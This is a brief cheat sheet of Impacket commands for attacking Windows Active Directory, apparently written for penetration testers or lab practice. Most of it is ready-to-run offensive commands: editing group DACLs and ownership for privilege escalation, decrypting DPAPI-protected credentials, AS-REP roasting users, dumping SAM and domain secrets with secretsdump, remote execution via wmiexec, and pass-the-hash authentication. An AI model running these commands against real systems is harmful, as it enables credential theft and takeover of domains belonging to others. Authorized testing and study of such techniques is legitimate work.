Impacket - CheatSheet

1.0 Installation

2.0 Configuration

3.0 Usage

3.1 impacket-dacledit

Modify DACL of a group

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'UserToModify' -target-dn 'CN=GROUPNAME,CN=USERS,DC=DOMAIN,DC=LOCAL' 'domain.local/user:pass'

3.2 impacket-dpapi

Decrypt dpapi secrets

PS %appdata%\Roaming\Microsoft\Credentials\ dir -h
download C4BB96844A5C9DD45D5B6A9859252BA6
PS %appdata%\Roaming\Microsoft\Protect\[sid]> dir -h
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid [sid] -password $pass
-> 0xlongkey
impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xlongkey

3.2 impacket-GetNPUsers

Get users with no preauthentication flag

impacket-GetNPUsers -dc-ip $dcip -request -usersfile users domain.local/

3.3 impacket-getTGT

Request a TGT

impacket-getTGT 'domain.local/user:pass'

3.4 impacket-owneredit

Change current owner of a group

impacket-owneredit -action 'write' -new-owner 'UserToSet' -target 'Groupname' 'domain.local/user:pass'

3.5 impacket-secretsdump

Local

impacket-secretsdump -sam sam -system system LOCAL

Remote

impacket-secretsdump 'domain.local/admin:pass@DC01'

3.6 impacket-smbclient

impacket-smbclient 'domain.local/user:pass@DC01'

3.7 impacket-wmiexec

impacket-wmiexec '@$dc.$domain.local' -k -no-pass -debug

4.0 Hints

4.1 Debug

If you encounter any errors during execution, try the -debug switch.

4.2 Authentication

You can use different authentication types:

• User / Password:

    `domain.local/user:pass`
  

• User / Hash:

    `-hashes :2a3de7fe356ee524cc9f3d579f2e0aa7  'domain.local/user'`
    
  

• Kerberos Cache:

    `-k -no-pass`
  

5.0 References

CheatSheet Kali